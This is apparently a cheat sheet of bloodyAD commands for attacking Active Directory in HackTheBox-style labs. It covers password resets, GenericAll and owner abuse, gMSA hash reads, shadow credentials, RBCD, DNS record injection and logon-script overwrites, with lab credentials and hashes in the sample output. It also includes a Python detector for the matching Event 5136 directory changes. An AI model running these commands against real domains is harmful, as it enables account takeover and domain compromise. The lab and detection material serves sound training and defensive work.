Installation

Using uv

uv tool install bloodyAD

Using pipx

pipx install bloodyAD

Retrieve User Information

bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username

Example:

$ bloodyAD --host dc.redelegate.vl -d redelegate.vl -u helen.frost -p P@ssword1 get object administrator

distinguishedName: CN=Administrator,CN=Users,DC=redelegate,DC=vl
accountExpires: 1601-01-01 00:00:00+00:00
adminCount: 1
cn: Administrator
description: Built-in account for administering the computer/domain
userAccountControl: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD; NOT_DELEGATED

Add User To Group

bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add

Example:

$ bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'it-computer3$' -k add groupMember helpdesk 'it-computer3$'
[+] it-computer3$ added to helpdesk

Change Password

bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password

Example:

$ bloodyAD --host DC1.KLENDATHU.VL -d KLENDATHU.VL -u rasczak -p starship99 set password RICO NewP@ssw0rd
[+] Password changed successfully!

Give User GenericAll Rights

bloodyAD --host $dc -d $domain -u $username -p $password add genericAll $DN $target_username

Example:

$ bloodyAD --host dc01.rebound.htb -d rebound.htb -u oorend -p '1GR8t@$$4u' add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' oorend
[+] oorend has now GenericAll on OU=SERVICE USERS,DC=REBOUND,DC=HTB

Using the SID:

$ bloodyAD --host dc01.rebound.htb -d rebound.htb -u oorend -p '1GR8t@$$4u' add genericAll 'S-1-5-21-2410575906-3092493790-2123333151-1104' 'S-1-5-21-750635624-2058721901-1932338391-2617'
[+] S-1-5-21-750635624-2058721901-1932338391-2617 has now GenericAll on S-1-5-21-2410575906-3092493790-2123333151-1104

WriteOwner

bloodyAD --host $dc -d $domain -u $username -p $password set owner $target_group $target_username

Example:

$ bloodyAD --host dc01.haze.htb -d dc01.haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' set owner SUPPORT_SERVICES 'Haze-IT-Backup$'
[+] Old owner S-1-5-21-323145914-28650650-2368316563-512 is now replaced by Haze-IT-Backup$ on SUPPORT_SERVICES

ReadGMSAPassword

bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username --attr msDS-ManagedPassword

Example:

$ bloodyAD --host dc01.vintage.htb -d vintage.htb -u 'fs01$' -p 'P@ssw0rd' -k get object 'gMSA01$' --attr msDS-ManagedPassword

distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:54311f0ed05b807a7aaf5943b595f224
msDS-ManagedPassword.B64ENCODED: c6qwf6x+EXiEYKGhCu/wTBcnp6hz3ppQG2uReaV8QV+JCaIhn2MobwBxF4Q6fd3W5P13wvh2Jf/Wp2WHsjIEjkbF0duDHoCBAK31Q+BoQg0eUHbsRcksNrkLcPtkZ5eUhK+TzgpXeFKt0VCOWFkAOStKE1H5PDfUGoC2xuP+Tceg7iV0IcMBaR8Db3UgqaqP2LLRiimuL6ZO4xl6sSRKrdRQEQOR7L9fFw9JW7myCsbj2TPxFc5WaMQtWi456OvwBQn4jhdty5tSjv2uMlcq+sQMz60voxH6sClACPGKJMCr2FNVJP6dd1GTdvh6n5Dbh/yhHCAF8UzYeGXv2Nx3Dw==

Enable a Disabled Account

bloodyAD --host $dc -d $domain -u $username -p $password remove uac $target_username -f ACCOUNTDISABLE

Example:

$ bloodyAD --host dc01.mirage.htb -d mirage.htb -u mark.bbond -p '1day@atime' -k remove uac javier.mmarshall -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from javier.mmarshall's userAccountControl

Add The TRUSTED_TO_AUTH_FOR_DELEGATION Flag

bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f TRUSTED_TO_AUTH_FOR_DELEGATION

Example:

$ bloodyAD --host dc.redelegate.vl -d redelegate.vl -u helen.frost -p 'P@ssword1' -k add uac 'FS01$' -f TRUSTED_TO_AUTH_FOR_DELEGATION
[-] ['TRUSTED_TO_AUTH_FOR_DELEGATION'] property flags added to FS01$'s userAccountControl

Modify UPN

bloodyAD --host $dc -d $domain -u $username -p $password set object $old_upn userPrincipalName -v $new_upn

Example:

$ bloodyAD --host dc-01.darkcorp.htb -d darkcorp.htb -u john.w -p 'Pack_Beneath_Solid9!' set object angela.w userPrincipalName -v angela.w.adm
[+] angela.w's userPrincipalName has been updated

Check that it has been modified

bloodyAD --host $dc -d $domain -u $username -p $password get object $target_user --attr userPrincipalName

Example:

$ bloodyAD --host dc-01.darkcorp.htb -d darkcorp.htb -u john.w -p 'Pack_Beneath_Solid9!' get object angela.w --attr userPrincipalName

distinguishedName: CN=Angela Williams,CN=Users,DC=darkcorp,DC=htb
userPrincipalName: angela.w.adm

MachineAccountQuota

Enumerate MachineAccountQuota

bloodyAD --host $dc -d $domain -u $username -p $password get object 'DC=dc,DC=dc' --attr ms-DS-MachineAccountQuota

Example:

$ bloodyAD --host dc-01.darkcorp.htb -d darkcorp.htb -u administrator -p ':fcb3ca5a19a1ccf2d14c13e8b64cde0f' get object 'DC=darkcorp,DC=htb' --attr ms-DS-MachineAccountQuota

distinguishedName: DC=darkcorp,DC=htb
ms-DS-MachineAccountQuota: 0

Set MachineAccountQuota value to 10

bloodyAD --host $dc -d $domain -u $username -p $password set object 'DC=dc,DC=dc' ms-DS-MachineAccountQuota -v 10

Example:

$ bloodyAD --host dc-01.darkcorp.htb -d darkcorp.htb -u administrator -p ':fcb3ca5a19a1ccf2d14c13e8b64cde0f' set object 'DC=darkcorp,DC=htb' ms-DS-MachineAccountQuota -v 10
[+] DC=darkcorp,DC=htb's ms-DS-MachineAccountQuota has been updated

Modify the email

bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user mail -v newmail@test.local

Example:

$ bloodyAD --host dc01.scepter.htb -d scepter.htb -u a.carter -p P@ssw0rd set object d.baker mail -v h.brown@scepter.htb
[+] d.baker's mail has been updated

Modify the altSecurityIdentities attribute (ESC14B)

bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user altSecurityIdentities -v 'X509:<RFC822>user@test.local'

Example:

$ bloodyAD --host dc01.scepter.htb -d scepter.htb -u h.brown -k set object p.adams altSecurityIdentities -v 'X509:<RFC822>p.adams@scepter.htb'
[+] p.adams's altSecurityIdentities has been updated

Find Writable Attributes

bloodyAD --host $dc -d $domain -u $username -p $password get writable --detail

Example:

$ bloodyAD --host dc01.scepter.htb -d scepter.htb -u 'h.brown' -k get writable --detail

distinguishedName: CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
altSecurityIdentities: WRITE

Shadow Credentials

bloodyAD --host $dc -d $domain -u $username -p $password add shadowCredentials $target

Example:

$ bloodyAD --host haze.htb -d haze.htb -u 'haze-it-backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -s add shadowCredentials 'edward.martin'

WriteSPN

bloodyAD --host $dc -d $domain -u $username -p $password set object $target servicePrincipalName -v 'domain/meow'

Example:

$ bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' set object alfred servicePrincipalName -v 'tombwatcher/meow'
[+] alfred's servicePrincipalName has been updated

Find Deleted Objects

bloodyAD --host $dc -d $domain -u $username -p $password get writable --include-del

Example:

$ bloodyAD --host dc.voleur.htb -d voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -k get writable --include-del

distinguishedName: CN=Todd Wolfe\\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb
permission: CREATE_CHILD; WRITE

Extended Search Operations

bloodyAD --host $dc -d $domain -u $username -p $password get search -h

e.g. pass -c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065 to display tombstoned objects:

bloodyAD --host $dc -d $domain -u $username -p $password -k get search -c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065

Restore a deleted object

bloodyAD --host $dc -d $domain -u $username -p $password -k set restore $user_to_restore

Example:

$ bloodyAD --host dc.voleur.htb -d voleur.htb -u svc_ldap -p M1XyC9pW7qT5Vn -k set restore todd.wolfe
[+] todd.wolfe has been restored successfully under CN=Todd Wolfe,OU=Second-Line Support Technicians,DC=voleur,DC=htb

Create a new computer account

bloodyAD --host $dc -d $domain -u $username -p $password add computer $computer_name $computer_password

Example:

$ bloodyAD --host DC1.delegate.vl -d delegate.vl -u n.thompson -p 'KALEB_2341' add computer meow 'P@ssw0rd'
[+] meow created

Add Resource Based Constrained Delegation

bloodyAD --host $dc -d $domain -u $username -p $password add rbcd 'DELEGATE_TO$' 'DELEGATE_FROM$'

Example:

$ bloodyAD --host dc2.domain.local -d domain.local -u 'C.Carlssen' -k add rbcd svc_sql 'meow$'
[!] No security descriptor has been returned, a new one will be created
[+] meow$ can now impersonate users on svc_sql via S4U2Proxy

Register a DNS Record

bloodyAD --host $dc -d $domain -u $username -p $password add dnsRecord $record_name $attacker_ip

Example:

$ bloodyAD --host S200401.overwatch.htb -u sqlsvc -p TI0LKcfHzZw1Vv add dnsRecord SQL07 10.10.14.61
[+] SQL07 has been successfully added

Overwrite the logon script path

bloodyAD --host $dc -d $domain -u $username -p $password set object $DN scriptPath -v $file

Example:

$ bloodyAD --host garfield.htb -d garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' set object 'CN=Liz Wilson,CN=Users,DC=garfield,DC=htb' scriptPath -v 'printerDetect.bat'
[+] CN=Liz Wilson,CN=Users,DC=garfield,DC=htb's scriptPath has been updated

Collect Bloodhound data

bloodyAD --host $dc -d $domain -u $username -p $password get bloodhound

Example:

$ bloodyAD --host DC2.pong.htb -d pong.htb --dc-ip 192.168.2.2 -u c.roberts -k get bloodhound
[+] Connecting to LDAP server
[+] Connected to LDAP serrver
Dumping schema: 2it [00:00, 5.33it/s]
Generating lookuptable: 96it [00:00, 102.83it/s]
Dumping SDs: 99%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████▌ | 99/100 [00:09<00:00, 9.98it/s]
Dumping domains: 100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 3.66it/s]
Dumping users: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 16/16 [00:00<00:00, 112.13it/s]
Dumping computers: 100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [00:00<00:00, 21.41it/s]
Dumping groups: 100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 52/52 [00:00<00:00, 328.41it/s]
Dumping GPOs: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3/3 [00:00<00:00, 31.36it/s]
Dumping OUs: 100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [00:00<00:00, 23.38it/s]
Dumping Containers: 100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 19/19 [00:00<00:00, 99.91it/s]
[+] Bloodhound data saved to 20260426T192924_Bloodhound.zip
[+] Found 1 trusts

Change Group Type to Domain Local

bloodyAD --host $dc -d $domain -u $username -p $password set object $group groupType -v -2147483644

Example:

$ bloodyAD --host DC2.pong.htb -d pong.htb -u c.roberts -k set object 'CN=gMSA Managers,CN=Users,DC=pong,DC=htb' groupType -v -2147483644
[+] CN=gMSA Managers,CN=Users,DC=pong,DC=htb's groupType has been updated

Get the msDS-ManagedPassword blob

bloodyAD --host $dc -d $domain -u $username -p $password get search --filter '(sAMAccountName=account_name$)' --attr 'msDS-ManagedPassword,msDS-ManagedPasswordId,sAMAccountName' --raw

Example:

$ bloodyAD --host dc2.pong.htb -d pong.htb -u 'c.roberts@ping.htb' -k get search --filter '(sAMAccountName=Pong_gMSA$)' --attr 'msDS-ManagedPassword,msDS-ManagedPasswordId,sAMAccountName' --raw

distinguishedName: CN=Pong_gMSA,CN=Managed Service Accounts,DC=pong,DC=htb
msDS-ManagedPassword: AQAAACQCAAAQABIBFAIcAnhZG1ix0PWawJDVD5CKMgZ7hrJ18mTj...[SNIP]
msDS-ManagedPasswordId: AQAAAEtEU0sCAAAAbAEAAAIAAAAAAAAAM1Hudw9yHvOOVt4ob5...[SNIP]
sAMAccountName: Pong_gMSA$
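Every write on this page (uac flags, altSecurityIdentities, servicePrincipalName, msDS-AllowedToActOnBehalfOfOtherIdentity, msDS-KeyCredentialLink, ms-DS-MachineAccountQuota, scriptPath, owner and ACE changes) lands in the directory as an attribute modification, which a domain controller with "Audit Directory Service Changes" enabled records as Security Event ID 5136. The following is an added detection example, not code from bloodyAD or its author: it parses a constructed, simplified key/value rendering of 5136 records (the real event is XML; the field names are the schema's), reports writes to the attributes above, and for userAccountControl diffs the bit flags between the "Value Deleted"/"Value Added" pair that a modify produces. The sample records, the object names, and the flag subset in UAC_FLAGS are assumptions made for the example.

```python
"""Constructed detection helper (not part of bloodyAD): flag Security Event 5136
writes to the attributes this page modifies and diff userAccountControl bits."""
import re
from typing import Dict, List

# Subset of userAccountControl bit flags (ADS_USER_FLAG_ENUM values).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

# Attributes worth reviewing, mapped to the page operation that writes them.
SENSITIVE_ATTRIBUTES = {
    "userAccountControl": "add/remove uac",
    "altSecurityIdentities": "ESC14 certificate mapping",
    "servicePrincipalName": "WriteSPN",
    "msDS-AllowedToActOnBehalfOfOtherIdentity": "add rbcd",
    "msDS-KeyCredentialLink": "add shadowCredentials",
    "ms-DS-MachineAccountQuota": "MachineAccountQuota change",
    "scriptPath": "logon script overwrite",
    "nTSecurityDescriptor": "set owner / add genericAll",
}

# Constructed sample (not real log data) in a simplified rendering of 5136.
# A modify of an existing value is a Value Deleted / Value Added pair sharing a CorrelationID.
SAMPLE_LOG = """\
EventID: 5136
SubjectUserName: helen.frost
ObjectDN: CN=FS01,CN=Computers,DC=example,DC=test
AttributeLDAPDisplayName: userAccountControl
AttributeValue: 4096
OperationType: Value Deleted
CorrelationID: {00000000-0000-0000-0000-000000000001}

EventID: 5136
SubjectUserName: helen.frost
ObjectDN: CN=FS01,CN=Computers,DC=example,DC=test
AttributeLDAPDisplayName: userAccountControl
AttributeValue: 16781312
OperationType: Value Added
CorrelationID: {00000000-0000-0000-0000-000000000001}

EventID: 5136
SubjectUserName: h.brown
ObjectDN: CN=p.adams,OU=Helpdesk,DC=example,DC=test
AttributeLDAPDisplayName: altSecurityIdentities
AttributeValue: X509:<RFC822>p.adams@example.test
OperationType: Value Added
CorrelationID: {00000000-0000-0000-0000-000000000002}
"""

def parse_events(text: str) -> List[Dict[str, str]]:
    """Split the simplified rendering into one dict per 5136 record."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")  # values may contain ':'
            fields[key.strip()] = value.strip()
        if fields.get("EventID") == "5136":
            events.append(fields)
    return events

def decode_uac(value: int) -> List[str]:
    """Names of the flags set in a userAccountControl integer, low bit first."""
    names = [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]
    unknown = value & ~sum(UAC_FLAGS)  # bits outside the table stay visible
    if unknown:
        names.append(f"UNKNOWN_0x{unknown:X}")
    return names

def _finding(actor, dn, attr, value, added=(), removed=()):
    return {"actor": actor, "dn": dn, "attribute": attr, "value": value,
            "technique": SENSITIVE_ATTRIBUTES[attr],
            "flags_added": list(added), "flags_removed": list(removed)}

def analyze(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """One finding per sensitive write; userAccountControl pairs are diffed."""
    findings, uac_old, uac_new, uac_meta = [], {}, {}, {}
    for ev in events:
        attr = ev.get("AttributeLDAPDisplayName", "")
        if attr not in SENSITIVE_ATTRIBUTES:
            continue  # routine attribute, not reported
        if attr == "userAccountControl":
            cid = ev["CorrelationID"]
            uac_meta[cid] = (ev["SubjectUserName"], ev["ObjectDN"])
            side = uac_old if ev["OperationType"] == "Value Deleted" else uac_new
            side[cid] = int(ev["AttributeValue"])
            continue
        findings.append(_finding(ev["SubjectUserName"], ev["ObjectDN"], attr,
                                 ev["AttributeValue"]))
    for cid, (actor, dn) in uac_meta.items():
        old, new = uac_old.get(cid, 0), uac_new.get(cid, 0)
        findings.append(_finding(actor, dn, "userAccountControl", str(new),
                                 decode_uac(new & ~old), decode_uac(old & ~new)))
    return findings
```

Run `analyze(parse_events(SAMPLE_LOG))` to get two findings: the altSecurityIdentities write by h.brown, and the FS01$ userAccountControl change by helen.frost reported as `flags_added=['TRUSTED_TO_AUTH_FOR_DELEGATION']`, which is exactly what the `add uac -f TRUSTED_TO_AUTH_FOR_DELEGATION` command above produces. Reads (the `get object`, `get writable` and gMSA password queries) do not generate 5136 and need object-access auditing (4662) instead; the value logged for nTSecurityDescriptor is an SDDL string, so owner and ACE changes still need a parser on top of this filter.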

Notes

  • Pass -k to use Kerberos authentication.
  • You can pass a user hash instead of a password using -p :hash.
  • Specify the format for --password or -k <keyfile> using -f, e.g. -f rc4.

Resources

Machines To Practice (HackTheBox)

  • Redelegate
  • Vintage
  • Infiltrator
  • Rebound
  • Absolute
  • Certified
  • TombWatcher
  • Voleur
  • PingPong